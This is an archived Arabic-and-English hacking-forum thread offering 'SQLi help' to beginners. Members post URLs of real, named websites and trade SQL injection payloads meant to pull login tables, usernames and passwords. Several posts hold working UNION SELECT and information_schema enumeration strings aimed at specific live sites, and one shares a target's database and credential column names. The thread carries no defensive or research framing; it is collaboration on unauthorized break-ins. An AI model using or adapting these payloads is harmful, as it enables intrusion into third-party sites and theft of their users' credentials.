:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   SQLi Help [service] OPEN (http://www.vbspiders.com/vb/t62343.html)

CODE3 05-13-2012 02:37 PM

SQLi Help [service] OPEN
 
Hello everyone!
This is free help service for beginners in SQLi.I know everyone face some problems in beginning so i made this thread to help them.

Rules:
Only Post your syntax where you stuck.
Wait for solution.
Dont ask me for cracking Hash.
Please make sure that URl must be vulnerable.

المفترس 05-13-2012 05:45 PM

رد: SQLi Help [service] OPEN
 
lets begin with that
and show me what can you do
ok
كود PHP:

http://www.winema.co.nz/index.php?PageID=84 

good luck

xavi13 05-13-2012 10:53 PM

رد: SQLi Help [service] OPEN
 
يا جماعة المنتدى عربي أم انجليزي :frown:

devyounss 05-14-2012 12:11 AM

رد: SQLi Help [service] OPEN
 
THE SYNTAX WHERE I STUCK
http://www.visionxip.com/ficha.php?i...0x6c6f67696e--

I BYPASSIT THE 403 FORBIDDEN
BUT I CAN't GET THE USER AND PASSWORD

FORBIDDEN PROBLEME
THX IN ADVANCE


المفترس 05-14-2012 09:08 AM

رد: SQLi Help [service] OPEN
 
اقتباس:

المشاركة الأصلية كتبت بواسطة devyounss (المشاركة 436301)

بعد ادن صاحب الموضوع

كود PHP:

http://www.visionxip.com/ficha.php?id=-297 UNION all /*!SELECT*/ 1,2,/*!concat*/(usuario,0x3a,pass)
,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from login-- 


devyounss 05-14-2012 12:44 PM

رد: SQLi Help [service] OPEN
 
جزاك الله خيرا يا ***1649;خى على المساعدة
هل لديك موقع يشرح كيفية تخطى الفلترة لأنه دائما يعيقني هدا المشكل

CODE3 05-14-2012 02:55 PM

رد: SQLi Help [service] OPEN
 
اقتباس:

المشاركة الأصلية كتبت بواسطة المفترس (المشاركة 436275)
lets begin with that
and show me what can you do
ok
كود PHP:

http://www.winema.co.nz/index.php?PageID=84 

good luck


it's 55 columns brother


المفترس 05-14-2012 11:37 PM

رد: SQLi Help [service] OPEN
 
اقتباس:

المشاركة الأصلية كتبت بواسطة CODE3 (المشاركة 436338)
it's 55 columns brother


I know that
any way thanks

أسدالله الدمشقي 05-15-2012 04:07 AM

رد: SQLi Help [service] OPEN
 
thx pro i dont have idea now ^_^

aircrack -ng 05-15-2012 03:49 PM

رد: SQLi Help [service] OPEN
 
اقتباس:

المشاركة الأصلية كتبت بواسطة CODE3 (المشاركة 436338)
it's 55 columns brother

non non non Blind sql Injection

xavi13 05-18-2012 09:36 PM

رد: SQLi Help [service] OPEN
 
http://sportmarket.co.il/index.php?type=i&id=152

اسرائيلي مصاب

CODE3 05-19-2012 02:18 PM

رد: SQLi Help [service] OPEN
 
اقتباس:

المشاركة الأصلية كتبت بواسطة xavi13 (المشاركة 436647)

the site doesn't work

SuperNoia 05-19-2012 08:33 PM

رد: SQLi Help [service] OPEN
 
DATABASE : "mundodofut1"
Table: "usuarios"
Coluns: "login" and "senha
"

site - mundodofutebol "website brazil"
locate = "/categoria/chuteiras//umbro/?origem=google#conteudo"

I used some tools and did not get success, then I take the test in Havij thus he discovered the name of the database tables and columns by guesswork, but when trying to extract the data, it can not guess some characters.

help please !

thx all ;)

best regards !

Brazilian's hACKING

aircrack -ng 05-19-2012 08:48 PM

رد: SQLi Help [service] OPEN
 
اقتباس:

المشاركة الأصلية كتبت بواسطة SuperNoia (المشاركة 436722)
DATABASE : "mundodofut1"
Table: "usuarios"
Coluns: "login" and "senha
"

site - mundodofutebol "website brazil"
locate = "/categoria/chuteiras//umbro/?origem=google#conteudo"

I used some tools and did not get success, then I take the test in Havij thus he discovered the name of the database tables and columns by guesswork, but when trying to extract the data, it can not guess some characters.

help please !

thx all ;)

best regards !

Brazilian's hACKING

Advanced SQL Injection Course


http://www.vbspiders.com/vb/t58687.html

aircrack -ng 05-19-2012 08:50 PM

رد: SQLi Help [service] OPEN
 
يثبت وهنا تكون حل مشاكل الحاقنين والي يعرف يحل مشكلة اي عضو يتفضل

SuperNoia 05-20-2012 03:58 AM

رد: SQLi Help [service] OPEN
 
aircrack -ng also advanced method of SQLI I could not succeed, thanks for the help! anyone have any suggestions ? thx !

CODE3 05-20-2012 04:36 PM

رد: SQLi Help [service] OPEN
 
اقتباس:

المشاركة الأصلية كتبت بواسطة SuperNoia (المشاركة 436722)
DATABASE : "mundodofut1"
Table: "usuarios"
Coluns: "login" and "senha
"

site - mundodofutebol "website brazil"
locate = "/categoria/chuteiras//umbro/?origem=google#conteudo"

I used some tools and did not get success, then I take the test in Havij thus he discovered the name of the database tables and columns by guesswork, but when trying to extract the data, it can not guess some characters.

help please !

thx all ;)

best regards !

Brazilian's hACKING


It means that your PC cannot display spanish language is proper way , for example letter like ***193; ***191; é ***237; ***243; ü ***241; ***250; and that is why you get ??? . You should try this :


أمير غزة 06-08-2012 10:37 PM

رد: SQLi Help [service] OPEN
 
اغلب الحقن بيكون بالمواقع الي بتدعم هيك
طيب كيف ممكن احقن مواقع ما فيها صفحات
؟

rajinet 06-23-2012 01:59 PM

رد: SQLi Help [service] OPEN
 
جزاك الله خيرا

mobo12dz 08-02-2012 08:52 AM

رد: SQLi Help [service] OPEN
 
يا حبيبي ما نوع هذا التشفييييير
›جٍ}³Xdض§ˆ2D=چe¢<W¯EZَ«]شiŒ)ژiحغ4» /j±eNâqVظ¬)·،6‹[حؤ`ي5¾†±´،›‡lçژµ®¦¸«k#®”TUگلض¤خضبü}éھFiخ>cُ¬
:½پ¤©\àî5د†َ¶ة=F+،سFف3‏ء5„9c[ذZ³’¾‰¯ّlUNُkPے

!.! 08-03-2012 04:53 AM

رد: SQLi Help [service] OPEN
 
اقتباس:

المشاركة الأصلية كتبت بواسطة mobo12dz (المشاركة 444428)
يا حبيبي ما نوع هذا التشفييييير
›جٍ}³Xdض§ˆ2D=چe¢<W¯EZَ«]شiŒ)ژiحغ4» /j±eNâqVظ¬)·،6‹[حؤ`ي5¾†±´،›‡lçژµ®¦¸«k#®”TUگلض¤خضبü}éھFiخ>cُ¬
:½پ¤©\àî5د†َ¶ة=F+،سFف3‏ء5„9c[ذZ³’¾‰¯ّlUNُkPے

والله لا اشك انا هذا تشفير هذا بالغة c++
لان هذا الشكل معارض للغة العربية
:1:

محمد الفسكاوى 11-18-2012 12:48 AM

رد: SQLi Help [service] OPEN
 
هدف ثمين حيرنى
مش عارف اوصل لعمود اليوزر والباس
وقفت معاة هنا
ياريت حد يكتبلى الكود اللى استعرض بية جميع جداول الموقع
انا واقف هنا مش عارف الاقى اليوزر والباص

كود:

http://www.zappacostajewels.com.au/jewels.php?iD=-44' UNION SELECT 1,2,3,group_concat(table_name,0x3a,column_name,0x3a,table_schema),5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=0x50524f434553534c495354-- -

VIURIS.SA 12-13-2012 01:33 AM

رد: SQLi Help [service] OPEN
 
السلام عليكم
المعذرة على اللقافة
http://www.zappacostajewels.com.au/j...13,14,15--%20-

GHOST HACKERS 12-13-2012 03:23 AM

رد: SQLi Help [service] OPEN
 
اقتباس:

المشاركة الأصلية كتبت بواسطة xavi13 (المشاركة 436289)
يا جماعة المنتدى عربي أم انجليزي :frown:

اخي انسخ الكلام على جوجل ...

هنا

GHOST HACKERS


THOR 12-13-2012 04:38 PM

رد: SQLi Help [service] OPEN
 
niCe tOpic

waTcH Your Solutions

freedom_h@ck3r 01-16-2013 04:52 PM

رد: SQLi Help [service] OPEN
 
http://www.vbspiders.com/vb/t66649.html

taoufik1992 03-03-2013 07:13 AM

رد: SQLi Help [service] OPEN
 
علاش مثلا فبعض المواقع المصابة ملي كديرorder by 1000 او order by 100000مكيتغير والو

freedom_h@ck3r 03-10-2013 02:45 PM

رد: SQLi Help [service] OPEN
 
اقتباس:

المشاركة الأصلية كتبت بواسطة taoufik1992 (المشاركة 460752)
علاش مثلا فبعض المواقع المصابة ملي كديرorder by 1000 او order by 100000مكيتغير والو

أخي العزيز أرجو توضيح سؤالك لكي يتم وضع الإجابة المناسبة له...

almafahd 08-13-2013 03:50 AM

رد: SQLi Help [service] OPEN
 
http://www.marketgrabber.com/demonew...aspx?country=1

اتمنى الطريقة الي اقدر اطلع كل tables

نظام وهمي 10-19-2013 04:13 PM

رد: SQLi Help [service] OPEN
 
مشكوووور

alluhaiby 12-04-2013 01:29 PM

رد: SQLi Help [service] OPEN
 
جزاك الله خيرا

الهكره ريومي 06-03-2014 12:05 PM

رد: SQLi Help [service] OPEN
 
الموضوع تم اهماله

mr.rhofex 03-26-2015 05:37 AM

رد: SQLi Help [service] OPEN
 
يا ريت لوحة التحكم ما قدرت اطلعها http://www.fleurlis.com.tw/en/wedding.php?id=1

gtote-ru 04-01-2016 03:15 AM

رد: SQLi Help [service] OPEN
 
شكرا لك

elictrojan 09-03-2016 05:32 PM

رد: SQLi Help [service] OPEN
 
تالللللللللللللل

hagelbagel101 05-03-2017 08:16 PM

رد: SQLi Help [service] OPEN
 
شكرا

mimo-dz 03-19-2018 09:48 PM

رد: SQLi Help [service] OPEN
 
شكرا لك اخي


الساعة الآن 08:42 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0